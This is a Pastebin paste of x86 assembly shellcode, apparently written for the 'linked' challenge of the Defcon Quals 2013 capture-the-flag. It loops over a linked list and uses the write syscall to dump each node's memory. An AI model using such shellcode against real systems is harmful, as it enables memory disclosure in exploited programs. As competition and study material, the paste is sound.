Data hosted with ♥ by Pastebin.com - Download Raw - See Original
  1. ; Defcon Quals 2013 - linked
  2. ; Dump all linked-list
  3. ; by timhsu@chroot.org, June 2013
  4.  
  5.     global _start
  6.     _start:
  7.         pop edi
  8.         pop ecx
  9.     _run:
  10.     mov ecx,[ecx]
  11.         xor      eax,eax
  12.         add      eax,4
  13.         ;mov      ebx,eax
  14.         push    eax
  15.     pop     ebx
  16.     ;mov      edx,100
  17.         int      0x80
  18.         jmp _run